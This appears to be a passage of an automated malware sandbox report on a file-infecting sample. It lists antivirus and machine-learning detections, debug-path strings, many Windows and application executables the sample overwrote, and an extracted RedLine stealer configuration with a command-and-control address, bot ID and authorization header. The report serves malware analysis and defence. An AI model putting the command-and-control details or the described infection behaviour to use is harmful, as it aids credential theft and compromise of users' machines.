                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                        Found malware configuration
                        Source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                        Multi AV Scanner detection for submitted file
                        Source: AENiBH7X1q.exeReversingLabs: Detection: 45%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: AENiBH7X1q.exeJoe Sandbox ML: detected
                        Source: AENiBH7X1q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000002.00000003.2102495566.0000000005B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdb source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: microsofts.exe, 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdb source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdb source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdb source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2745183180.00000000005F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000003.00000003.2720656204.00000000005B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb346 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000006.00000002.3520993422.0000000006576000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8v= source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdbGCTL source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb^ source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Infects executable files (exe, dll, sys, html)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
